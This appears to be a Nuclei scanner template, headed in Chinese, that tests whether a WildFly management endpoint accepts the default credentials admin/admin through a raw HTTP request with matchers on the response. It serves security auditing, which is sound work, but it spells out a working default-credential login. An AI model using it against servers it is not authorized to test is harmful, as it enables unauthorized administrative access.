漏洞描述
Wildfly default admin login credentials were successful.
id: wildfly-default-login
info:
name: Wildfly - Default Admin Login
author: s0obi
severity: high
description: |
Wildfly default admin login credentials were successful.
reference:
- https://docs.wildfly.org/26.1/#administrator-guides
metadata:
max-request: 1
tags: wildfly,default-login,vuln
http:
- raw:
- |
GET /management HTTP/1.1
Host: {{Hostname}}
digest-username: admin
digest-password: admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- "management-major-version"
- "product-version"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100cf078bebba067725b475fd999c726c3dfc8cc0728fb91439e0428e9f26ed2e600220454a674e2138c53762631b54451e2239a4c3dd9efed9669d512ae55d2e5d3cf2:922c64590222798bb761d5b6d8e72950